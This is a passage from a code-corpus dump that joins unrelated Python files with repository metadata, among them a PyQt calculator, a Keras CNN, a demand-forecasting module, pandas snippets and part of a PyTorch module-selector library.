"""Automatically kill any Python processes forked in this context, for
cleanup. Handles any descendants.
Timeout is seconds to wait for graceful termination before killing children.
"""
try:
# TODO: What to yield here?
yield
finally:
alive = kill_children(timeout)
num_alive = len(alive)
# Get current exception - if something was raised we should be raising
# that.
# XXX: Need to check use cases to see if there are any cases where
# we are expecting an exception outside of the 'contained_children'
# block.
_, exc, _ = sys.exc_info()
if assert_graceful and exc is None:
assert not num_alive, f"Unexpected children still alive: {alive}"
def disable_child_tracking():
# TODO: Actually needed?
pids = [p.pid for p in active_children()]
return pids
def kill_children(timeout=1) -> List[psutil.Process]:
"""
Kill any active children, returning any that were not terminated within
timeout.
Args:
timeout: time to wait before killing.
Returns:
list of processes that had to be killed forcefully.
"""
procs = active_children()
for p in procs:
try:
p.terminate()
except psutil.NoSuchProcess:
pass
gone, alive = psutil.wait_procs(procs, timeout=timeout)
for p in alive:
logger.warning("Cleaning up child: %d", p.pid)
p.kill()
return alive
| 2.171875 | 2 |
data/meneame/parse_meneame.py | segurac/DeepQA | 0 | 10887 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2016 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import gzip
parents = {}
conversations = []
samples = {}
class Sample:
comentario_id = None
parent_id = []
commentario = ''
comentario_id = None
parent_id = []
with gzip.open(sys.argv[1]) as f:
for line in f:
try:
line = line.decode('utf-8').strip()
#print(line)
splitted_line = line.split()
if len(splitted_line) == 0:
continue
head = splitted_line[0]
rest = splitted_line[1:]
if head == 'comentario_id:':
comentario_id = rest[0]
parent_id = []
if head == 'parent_id:':
parent_id.append(rest[0])
if head == 'comentario:':
comentario = rest
if len(comentario) == 0:
comentario_id = None
parent_id = []
continue
            # Store this comment in the samples dictionary, keyed by its comment id
if comentario_id is not None:
sample = Sample()
sample.comentario_id = comentario_id
sample.parent_id = parent_id
sample.comentario = comentario
samples[comentario_id] = sample
comentario_id = None
parent_id = []
except:
continue
for k in samples:
sample = samples[k]
for parent in sample.parent_id:
if parent in samples:
qa = [samples[parent].comentario, sample.comentario]
conversations.append(qa)
for conversation in conversations:
print('********************************************')
for frase in conversation:
print(*frase)
| 2.609375 | 3 |
dfstools/tests/test_relationship_tools.py | orekunrin/comp410_summer2020 | 0 | 10888 | import unittest
import pandas as pd
import git
import os
from dfstools import get_dataset_dtypes
from dfstools import find_related_cols_by_name
from dfstools import find_related_cols_by_content
from dfstools import find_parent_child_relationships
from dfstools import pecan_cookies_load_data
class RelationshipTools(unittest.TestCase):
def test_get_dataset_dtypes(self):
expected = {'airlines': {'carrier': {'dtype': 'O'}},
'airports': {'dest': {'dtype': 'O'}},
'flights': {'dest': {'dtype': 'O'}, 'carrier': {'dtype': 'O'},'flight_id': {'dtype': 'O'}},
'trip_logs': {'flight_id': {'dtype': 'O'}}}
result = get_dataset_dtypes(None)
self.assertEqual(expected, result)
expected = {
'airlines': {'carrier': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.carrier': {}}]}},
'airports': {'dest': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'flights.dest': {}}]}},
'flights': {'dest': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airports.dest': {}}]},
'carrier': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'airlines.carrier': {}}]},
'flight_id': {'dtype': 'O',
# 'key_candidate': True,
'relationships': [{'trip_logs.flight_id': {}}]}},
'trip_logs': {'flight_id': {'dtype': 'O',
# 'key_candidate': False,
'relationships': [{'flights.flight_id': {}}]}}}
data = os.path.join(git.Repo('.', search_parent_directories=True).working_tree_dir, 'data')
dataframe_dict = {'airlines': pd.read_csv(os.path.join(data, 'airlines', 'airlines.csv')),
'flights': pd.read_csv(os.path.join(data, 'flights', 'flights.csv')),
'airports': pd.read_csv(os.path.join(data, 'airports', 'airports.csv'))}
result = find_related_cols_by_name(dataframe_dict, result)
self.assertEqual(expected, result)
def test_find_related_cols_by_content(self):
# ---pecan cookies sprint one test case---
expected = {
'airports': {'dest': {'relationships': ['flights.origin', 'flights.dest']},
'dest_city': {'relationships': ['flights.origin_city']},
'dest_state': {'relationships': ['flights.origin_state']}},
'airlines': {'carrier': {'relationships': ['flights.carrier']}},
"flights": {
"flight_id": {"relationships": []},
"origin": {"relationships": ["airports.dest"]},
"origin_city": {"relationships": ["airports.dest_city"]},
"origin_state": {"relationships": ["airports.dest_state"]},
"dest": {"relationships": ["airports.dest"]},
"distance_group": {"relationships": []},
"carrier": {"relationships": ["airlines.carrier"]},
"flight_num": {"relationships": []},
"first_trip_logs_time": {"relationships": []}}
}
data_list = pecan_cookies_load_data()
result = find_related_cols_by_content(data_list)
self.assertEqual(expected, result)
#result = find_parent_child_relationships(None, result)
#self.assertEqual(expected, result)
if __name__ == '__main__':
unittest.main()
| 2.6875 | 3 |
Calculator.py | KunalKatiyar/Calculator | 0 | 10889 | import sys
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QGroupBox, QDialog, QVBoxLayout, QGridLayout, QMainWindow, QAction, QLineEdit, QMessageBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QDialog):
def __init__(self):
super().__init__()
self.title = 'Calculator'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.createGridLayout()
windowLayout = QVBoxLayout()
windowLayout.addWidget(self.horizontalGroupBox)
self.setLayout(windowLayout)
self.textbox = QLineEdit(self)
self.textbox.move(20, 40)
self.textbox.resize(600,35)
# Original Approach
# buttonp = QPushButton('+', self)
# buttonp.setToolTip('Addition Operator')
# buttonp.move(100,70)
# buttonp.clicked.connect(self.on_click)
# buttonm = QPushButton('-', self)
# buttonm.setToolTip('Subtraction Operator')
# buttonm.move(100,100)
# buttonm.clicked.connect(self.on_click)
self.show()
def createGridLayout(self):
self.horizontalGroupBox = QGroupBox("Grid")
layout = QGridLayout()
# layout.setColumnStretch(1, 2)
# layout.setColumnStretch(2, 4)
layout.addWidget(QPushButton('1'),0,0)
layout.addWidget(QPushButton('2'),0,1)
layout.addWidget(QPushButton('3'),0,2)
layout.addWidget(QPushButton('4'),1,0)
layout.addWidget(QPushButton('5'),1,1)
layout.addWidget(QPushButton('6'),1,2)
layout.addWidget(QPushButton('7'),2,0)
layout.addWidget(QPushButton('8'),2,1)
layout.addWidget(QPushButton('9'),2,2)
layout.addWidget(QPushButton('0'),3,1)
layout.addWidget(QPushButton('.'),3,0)
layout.addWidget(QPushButton('='),3,2)
layout.addWidget(QPushButton('+'),0,4)
layout.addWidget(QPushButton('-'),1,4)
layout.addWidget(QPushButton('*'),2,4)
layout.addWidget(QPushButton('/'),3,4)
self.horizontalGroupBox.setLayout(layout)
# @pyqtSlot()
# def on_click(self):
# print('Button click')
@pyqtSlot()
def on_click(self):
textboxValue = "Good"
QMessageBox.question(self, 'Message - pythonspot.com', "You typed: " + textboxValue, QMessageBox.Ok, QMessageBox.Ok)
self.textbox.setText("Good")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_()) | 2.859375 | 3 |
analysis/src/util/_concepts.py | Domiii/code-dbgs | 95 | 10890 | <filename>analysis/src/util/_concepts.py
# // ###########################################################################
# // Queries
# // ###########################################################################
# -> get a single cell of a df (use `iloc` with `row` + `col` as arguments)
df.iloc[0]['staticContextId']
# -> get one column as a list
allFunctionNames = staticContexts[['displayName']].to_numpy().flatten().tolist()
# -> get all rows that match a condition
callLinked = staticTraces[~staticTraces['callId'].isin([0])]
# -> exclude columns
df.drop(['A', 'B'], axis=1)
# -> complex queries
staticTraces.query(f'callId == {callId} or resultCallId == {callId}')
# -> join queries (several examples)
# https://stackoverflow.com/a/40869861
df.set_index('key').join(other.set_index('key'))
B.query('client_id not in @A.client_id')
B[~B.client_id.isin(A.client_id)]
# merging dfs
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.merge.html
pd.merge(df1, df2, on=['A', 'B'])
df1.merge(df2, left_on='lkey', right_on='rkey')
# // ###########################################################################
# // Display
# // ###########################################################################
# -> display a groupby object (https://stackoverflow.com/questions/22691010/how-to-print-a-groupby-object)
groups = df.groupby('A')
for key, item in groups:
group = groups.get_group(key)
display(group)
# .to_numpy().flatten().tolist() | 2.28125 | 2 |
src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 0 | 10891 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: v3/diff/UniversalDiff.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from v3.diff import Transaction_pb2 as v3_dot_diff_dot_Transaction__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='v3/diff/UniversalDiff.proto',
package='v3.diff',
syntax='proto3',
serialized_pb=_b('\n\x1bv3/diff/UniversalDiff.proto\x12\x07v3.diff\x1a\x19v3/diff/Transaction.proto\";\n\rUniversalDiff\x12*\n\x0ctransactions\x18\x01 \x03(\x0b\x32\x14.v3.diff.Transactionb\x06proto3')
,
dependencies=[v3_dot_diff_dot_Transaction__pb2.DESCRIPTOR,])
_UNIVERSALDIFF = _descriptor.Descriptor(
name='UniversalDiff',
full_name='v3.diff.UniversalDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transactions', full_name='v3.diff.UniversalDiff.transactions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=126,
)
_UNIVERSALDIFF.fields_by_name['transactions'].message_type = v3_dot_diff_dot_Transaction__pb2._TRANSACTION
DESCRIPTOR.message_types_by_name['UniversalDiff'] = _UNIVERSALDIFF
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UniversalDiff = _reflection.GeneratedProtocolMessageType('UniversalDiff', (_message.Message,), dict(
DESCRIPTOR = _UNIVERSALDIFF,
__module__ = 'v3.diff.UniversalDiff_pb2'
# @@protoc_insertion_point(class_scope:v3.diff.UniversalDiff)
))
_sym_db.RegisterMessage(UniversalDiff)
# @@protoc_insertion_point(module_scope)
| 1.257813 | 1 |
src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 2 | 10892 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import annotations
import numpy as np
import torch
from torch import Tensor
from onevision.data.augment.base import BaseAugment
from onevision.data.augment.utils import apply_transform_op
from onevision.data.data_class import ObjectAnnotation
from onevision.factory import AUGMENTS
__all__ = [
"ImageBoxAugment",
]
# MARK: - Modules
@AUGMENTS.register(name="image_box_augment")
class ImageBoxAugment(BaseAugment):
r"""
Args:
policy (str):
Augmentation policy. One of: [`scratch`, `finetune`].
Default: `scratch`.
"""
cfgs = {
"scratch": [
# (op_name, p, magnitude)
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.5, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
"finetune": [
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.8, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
}
# MARK: Magic Functions
    def __init__(self, policy: str = "scratch", *args, **kwargs):
        super().__init__(*args, **kwargs)
        if policy not in self.cfgs:
            raise ValueError(f"`policy` must be one of: {self.cfgs.keys()}."
                             f" But got: {policy}")
        self.policy = policy  # stored so __repr__ can report the active policy
        self.transforms = self.cfgs[policy]
def __repr__(self) -> str:
return self.__class__.__name__ + \
f"(policy={self.policy}, fill={self.fill})"
# MARK: Configure
def _augmentation_space(self, *args, **kwargs) -> dict[str, tuple[Tensor, bool]]:
pass
# MARK: Forward Pass
def forward(self, input: np.ndarray, target: np.ndarray) -> tuple[np.ndarray, np.ndarray]:
"""
Args:
input (np.ndarray):
Image to be transformed.
target (np.ndarray[*, 4):
Target to be transformed. Boxes in (x, y, x, y) format.
"""
# NOTE: Transform
transform_id = int(torch.randint(len(self.transforms), (1,)).item())
num_ops = len(self.transforms[transform_id])
probs = torch.rand((num_ops,))
for i, (op_name, p, magnitude) in enumerate(self.transforms[transform_id]):
if probs[i] > p:
continue
magnitude = magnitude if magnitude is not None else 0.0
if op_name == "image_box_random_perspective":
"""
target[:, 2:6] = box_cxcywh_norm_to_xyxy(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
nl = len(target) # Number of labels
if nl:
target = target
else:
target = np.zeros((nl, ObjectAnnotation.box_label_len()))
"""
target[:, 2:6] = box_xyxy_to_cxcywh_norm(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
else:
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
'''
elif op_name == "adjust_hsv":
input = adjust_hsv(
input,
h_factor = magnitude[0],
s_factor = magnitude[1],
v_factor = magnitude[2],
)
elif op_name == "hflip":
input = np.fliplr(input)
target[:, 2] = 1 - target[:, 2]
elif op_name == "vflip":
input = np.flipud(input)
target[:, 3] = 1 - target[:, 3]
'''
return input, target
| 1.945313 | 2 |
dataviz/euvotes.py | Udzu/pudzu | 119 | 10893 | from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')
palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]
def votecolfn(n):
return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]
def colorfn(c):
if c not in df.index:
return "white" if c in ['Sea', 'Borders'] else "grey"
return votecolfn(int(df.loc[c].votes))
def labelfn(c):
if c not in df.index: return None
dfc = df.loc[c]
label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
map = map_chart("maps/Europe.png", colorfn, labelfn)
# legend
def box(c):
return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))
vote_arr = Image.from_array([
[box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)
title = Image.from_column([
Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
bg="white")
img = Image.from_column([title, chart], bg="white", padding=2)
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
| 2.578125 | 3 |
WarmUpSTE.py | jrolf/jse-api | 1 | 10894 |
import pandas as pd
import numpy as np
from copy import *
from bisect import *
from scipy.optimize import curve_fit
from sklearn.metrics import *
from collections import defaultdict as defd
import datetime,pickle
from DemandHelper import *
import warnings
warnings.filterwarnings("ignore")
#################################################################
#################################################################
#################################################################
class DemandForecastModel:
def __init__(self,rank_model='',forecast='',rmodel_beta=1.0,final_beta=1.0):
if rank_model != '':
self.ingest(rank_model,forecast,rmodel_beta,final_beta)
def ingest(self,rank_model,forecast,rmodel_beta=1.0,final_beta=1.0):
self.rank_model = rank_model
self.rmodel_beta = rmodel_beta
self.forecast = forecast
self.final_beta = final_beta
self.alldates = sorted(forecast.index)
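    # Note on predict() below: it chains the rank->sales regression (scaled by rmodel_beta),
    # the dated demand forecast's lower/central/upper estimates (yhat_lower / yhat / yhat_upper),
    # the final_beta adjustment, and finally global2local() to convert market-wide demand to
    # the given buy-box share.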
def predict(self,rank=10000,date='2018-07-04',buybox=100):
if 'str' not in str(type(date)): date = str(date)[:10]
pred1 = self.rank_model.predict([rank])[0]
pred2 = pred1*self.rmodel_beta
d = self.forecast.loc[date]
mid,lo,hi = d['yhat'],d['yhat_lower'],d['yhat_upper']
rdr_preds = np.array([lo,mid,hi])
pred3 = pred2*rdr_preds
pred4 = pred3*self.final_beta
pred5 = global2local(pred4,buybox)
return pred5
#################################################################
#################################################################
# Export a fitted model to text file:
# These filenames normally end in '.pkl'
def ExportModel(filename,model_object):
pickle.dump(model_object, open(filename, 'wb'))
print('Model Saved TO: '+filename)
# Import a fitted model from text file:
# These filenames normally end in '.pkl'
def ImportModel(filename):
model_object = pickle.load(open(filename, 'rb'))
print('Model Imported FROM: '+filename)
return model_object
def GetToday():
today = datetime.datetime.today()
return str(today)[:10]
#################################################################
#################################################################
#################################################################
short2long = {
'H&G' : 'Home & Garden',
'L&G' : 'Lawn & Garden',
'SPORTS' : 'Sports & Outdoors',
'HI' : 'Home Improvement',
'TOY' : 'Toys & Games',
'KIT' : 'Home & Kitchen',
}
long2short = {}
for short in sorted(short2long):
long2short[short2long[short]] = short
Shorts = sorted(short2long)
Longs = sorted(long2short)
def ConvertToShort(thing):
if thing in long2short: return long2short[thing]
return thing
Models2 = {}
for SH in Shorts:
fn = 'MODELS/'+SH+'/DFM2.pkl'
model = ImportModel(fn)
Models2[SH] = model
AllDates = sorted(set([str(a)[:10] for a in Models2['H&G'].alldates]))
#################################################################
#################################################################
# Returns a list of valid category names:
def GetCategories2():
return sorted(long2short)
# SPREETAIL DEMAND PREDICTION:
# cat : Category (String or List)
# rank : Sales Rank (Integer, 2-List, Long-List)
# date1 : First Date of Forecast ("2018-09-03")
# date2 : Final Date of Forecast OR # Days Forward ("2018-10-03" or 30)
# bb_ratio : BuyBox Percent (100.0)
# md_ratio : Marketplace Distribution Percent
def SpreetailPredict(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
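    # Overview (descriptive note): resolve the requested date window against AllDates, build a
    # per-day frame of (category, rank, buy-box ratio, marketplace share), query the per-category
    # DemandForecastModel for 100% and buy-box-adjusted demand, add the "other marketplaces"
    # share implied by md_ratio, and return the cumulative total prediction plus the full
    # day-by-day matrix.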
if (not date1) or (str(date1).lower()=='today'): date1 = GetToday()
index1 = bisect_left(AllDates,date1)
if len(str(date2)) >10: date2 = str(date2)[:10]
if len(str(date2))==10: index2 = bisect_left(AllDates,date2)
else: index2 = index1+int(date2)
index_dif = abs(index2-index1)
index1 = min([index1,index2])
index2 = index1+index_dif
DateRange = AllDates[index1:index2+1]
LEN = len(DateRange)
#--------------------------------------
tdf = pd.DataFrame()
tdf['DATE'] = DateRange
#--------------------------------------
if 'list' in str(type(cat)):
cat = [ConvertToShort(a) for a in cat]
if len(cat)==LEN: tdf['CAT'] = cat
else: tdf['CAT'] = cat[0]
else: tdf['CAT'] = ConvertToShort(cat)
#--------------------------------------
if 'list' in str(type(rank)):
if len(rank)==LEN: tdf['RANK'] = rank
elif len(rank)==2:
r1,r2 = tuple(rank)
tdf['RANK'] = np.linspace(r1,r2,LEN)
else: tdf['RANK'] = rank[0]
else: tdf['RANK'] = rank
#--------------------------------------
md_ratio2 = max(0.3,min(md_ratio,0.99))
other_ratio = (1.0-md_ratio2)/md_ratio2
tdf['BBR'] = bb_ratio
tdf['MDR'] = md_ratio2
#--------------------------------------
M = tdf.values
results = []
for row in M:
d,c,r = tuple(row[:3])
pred_100 = Models2[c].predict(r,d,100.0)
pred_bbr = Models2[c].predict(r,d,100.0*bb_ratio)
results.append([pred_100,pred_bbr])
tdf['P_100'] = [r[0][1] for r in results]
tdf['P_100_HI'] = [r[0][2] for r in results]
tdf['P_100_LO'] = [r[0][0] for r in results]
tdf['P_BBR'] = [r[1][1] for r in results]
tdf['P_BBR_HI'] = [r[1][2] for r in results]
tdf['P_BBR_LO'] = [r[1][0] for r in results]
tdf['P_OTH'] = other_ratio * tdf['P_100']
tdf['P_OTH_HI'] = other_ratio * tdf['P_100_HI']
tdf['P_OTH_LO'] = other_ratio * tdf['P_100_LO']
tdf['P_TOT'] = tdf['P_BBR'] +tdf['P_OTH']
tdf['P_TOT_HI'] = tdf['P_BBR_HI']+tdf['P_OTH_HI']
tdf['P_TOT_LO'] = tdf['P_BBR_LO']+tdf['P_OTH_LO']
cols = list(tdf.columns)[5:]
for col in cols:
col2 = col+'_C'
tdf[col2] = np.cumsum(tdf[col])
Matrix = [list(tdf.columns)]
for row in tdf.values:
Matrix.append(list(row))
MainPred = list(tdf['P_TOT_C'])[-1]
return [MainPred,Matrix]
def SpreePred(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
result = SpreetailPredict(cat,rank,date1,date2,bb_ratio,md_ratio)
M = result[1]
cols,m = M[0],M[1:]
return pd.DataFrame(m,columns=cols)
#################################################################
#################################################################
# [END]
| 2.359375 | 2 |
Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 7 | 10895 | <gh_stars>1-10
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D

num_classes = 10

# Load MNIST, add a channel dimension, scale to [0, 1] and one-hot encode the labels
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(-1, 28, 28, 1).astype('float32') / 255.0
x_test = x_test.reshape(-1, 28, 28, 1).astype('float32') / 255.0
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)

model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
                 activation='relu',
                 input_shape=(28, 28, 1)))  # MNIST images are 28x28 grayscale
model.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(10000, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))

model.compile(loss='categorical_crossentropy',
              optimizer='sgd',
              metrics=['accuracy'])

model.fit(x_train, y_train,
          epochs=100,
          validation_data=(x_test, y_test))

score = model.evaluate(x_test, y_test)
| 2.84375 | 3 |
k1lib/selector.py | 157239n/k1lib | 1 | 10896 | <filename>k1lib/selector.py
# AUTOGENERATED FILE! PLEASE DON'T EDIT
"""
This module is for selecting a subnetwork using CSS-like selectors so that you can
do special things to it. Check out the tutorial section for a walkthrough. This is exposed
automatically with::
from k1lib.imports import *
selector.select # exposed
"""
from torch import nn; import k1lib, re, torch
from typing import List, Tuple, Dict, Union, Any, Iterator, Callable
from contextlib import contextmanager; from functools import partial
__all__ = ["ModuleSelector", "preprocess", "select"]
def preprocess(selectors:str, defaultProp="*") -> List[str]:
r"""Removes all quirkly features allowed by the css
language, and outputs nice lines. Example::
# returns ["a:f", "a:g,h", "b:g,h", "t:*"]
selector.preprocess("a:f; a, b: g,h; t")
:param selectors: single css selector string. Statements separated
by "\\n" or ";"
:param defaultProp: default property, if statement doesn't have one"""
# filtering unwanted characters and quirky spaces
lines = [e for l in selectors.split("\n") for e in l.split(";")]
    selectors = [re.sub(r"(^\s+)|(\s+$)", "", re.sub(r"\s\s+", " ", line)).replace(" >", ">").replace("> ", ">").replace(" :", ":").replace(": ", ":").replace(" ,", ",").replace(", ", ",").replace(";", "\n").replace(" \n", "\n").replace("\n ", "\n") for line in lines if line != ""]
# adding "*" to all selectors with no props specified
selectors = [selector if ":" in selector else f"{selector}:{defaultProp}" for selector in selectors]
# expanding comma-delimited selectors
return [f"{segment}:{selector.split(':')[1]}" for selector in selectors for segment in selector.split(":")[0].split(",")]
def _getParts(s:str): return [a for elem in s.split(":")[0].split(">") if elem for a in elem.split(" ") if a]
def _getProps(s:str): return [elem for elem in s.split(":")[1].split(",") if elem]
_idxAuto = k1lib.AutoIncrement()
class ModuleSelector: # empty methods so that Sphinx generates the docs in order
props:List[str]
"""Properties of this :class:`ModuleSelector`"""
idx:int
"""Unique id of this :class:`ModuleSelector` in the entire script. May be useful
for module recognition"""
nn:"torch.nn.Module"
"""The associated :class:`torch.nn.Module` of this :class:`ModuleSelector`"""
def __init__(self, parent:"ModuleSelector", name:str, nn:"torch.nn.Module"):
self.parent = parent; self.name = name; self.nn = nn
self._children:Dict["ModuleSelector"] = {}
self.props:List[str] = []; self.depth:int = 0
self.directSelectors:List[str] = []
self.indirectSelectors:List[str] = []
self.displayF:Callable[["ModuleSelector"], str] = lambda mS: ', '.join(mS.props)
self.idx = _idxAuto()
def deepestDepth(self): pass
def highlight(self, prop:str):
"""Highlights the specified prop when displaying the object."""
self.displayF = lambda self: (k1lib.fmt.txt.red if prop in self else k1lib.fmt.txt.identity)(', '.join(self.props))
return self
def __call__(self, *args, **kwargs):
"""Calls the internal :class:`torch.nn.Module`"""
return self.nn(*args, **kwargs)
def __contains__(self): pass
def named_children(self): pass
def children(self): pass
def named_modules(self): pass
def modules(self): pass
def directParams(self): pass
def parse(self): pass
def apply(self): pass
def clearProps(self): pass
@property
def displayF(self):
"""Function to display each ModuleSelector's lines.
Default is just::
lambda mS: ", ".join(mS.props) """
return self._displayF
@displayF.setter
def displayF(self, f):
def applyF(self): self._displayF = f
self.apply(applyF)
def __getattr__(self, attr):
if attr.startswith("_"): raise AttributeError(attr)
if attr in self._children: return self._children[attr]
return self.directParams[attr]
def __getitem__(self, idx): return getattr(self, str(idx))
@staticmethod
def sample() -> "ModuleSelector":
"""Create a new example :class:`ModuleSelector` that has a bit of
hierarchy to them, with no css."""
return nn.Sequential(nn.Linear(3, 4), nn.Sequential(nn.Conv2d(3, 8, 3, 2), nn.ReLU(), nn.Linear(5, 6)), nn.Linear(7, 8)).select("")
def hookF(self): pass
def hookFp(self): pass
def hookB(self): pass
def freeze(self): pass
def unfreeze(self): pass
@k1lib.patch(nn.Module)
def select(model:"torch.nn.Module", css:str="*") -> "k1lib.selector.ModuleSelector":
"""Creates a new ModuleSelector, in sync with a model.
Example::
mS = selector.select(nn.Linear(3, 4), "#root:propA")
Or, you can do it the more direct way::
mS = nn.Linear(3, 4).select("#root:propA")
:param model: the :class:`torch.nn.Module` object to select from
:param css: the css selectors"""
root = ModuleSelector(None, "root", model)
root.parse(preprocess(css)); return root
@k1lib.patch(ModuleSelector, name="apply")
def _apply(self, f:Callable[[ModuleSelector], None]):
"""Applies a function to self and all child :class:`ModuleSelector`"""
f(self)
for child in self._children.values(): child.apply(f)
@k1lib.patch(ModuleSelector, name="parse")
def _parse(self, selectors:Union[List[str], str]) -> ModuleSelector:
"""Parses extra selectors. Clears all old selectors, but retain
the props. Returns self. Example::
mS = selector.ModuleSelector.sample().parse("Conv2d:propA")
# returns True
"propA" in mS[1][0]
:param selectors: can be the preprocessed list, or the unprocessed css string"""
if isinstance(selectors, str): selectors = preprocess(selectors)
self.directSelectors = []; self.indirectSelectors = []
ogSelectors = selectors
if self.parent != None:
selectors = [] + selectors + self.parent.indirectSelectors + self.parent.directSelectors
self.indirectSelectors += self.parent.indirectSelectors
self.depth = self.parent.depth + 1
for selector in selectors:
parts = _getParts(selector)
matches = parts[0] == self.nn.__class__.__name__ or parts[0] == "#" + self.name or parts[0] == "*"
if len(parts) == 1:
if matches: self.props += _getProps(selector)
else:
a = selector.find(">"); a = a if a > 0 else float("inf")
b = selector.find(" "); b = b if b > 0 else float("inf")
direct = a < b
if matches:
if direct: self.directSelectors.append(selector[a+1:])
else: self.indirectSelectors.append(selector[b+1:])
for name, mod in self.nn.named_children():
if name not in self._children:
self._children[name] = ModuleSelector(self, name, mod)
self._children[name].parse(ogSelectors)
self.props = list(set(self.props)); return self
@k1lib.patch(ModuleSelector)
def __contains__(self, prop:str=None) -> bool:
"""Whether this :class:`ModuleSelector` has a specific prop.
Example::
# returns True
"b" in nn.Linear(3, 4).select("*:b")
# returns False
"h" in nn.Linear(3, 4).select("*:b")
# returns True, "*" here means the ModuleSelector has any properties at all
"*" in nn.Linear(3, 4).select("*:b")"""
if "*" in self.props: return True
if prop in self.props: return True
if prop == "*" and len(self.props) > 0: return True
return False
@k1lib.patch(ModuleSelector)
def named_children(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
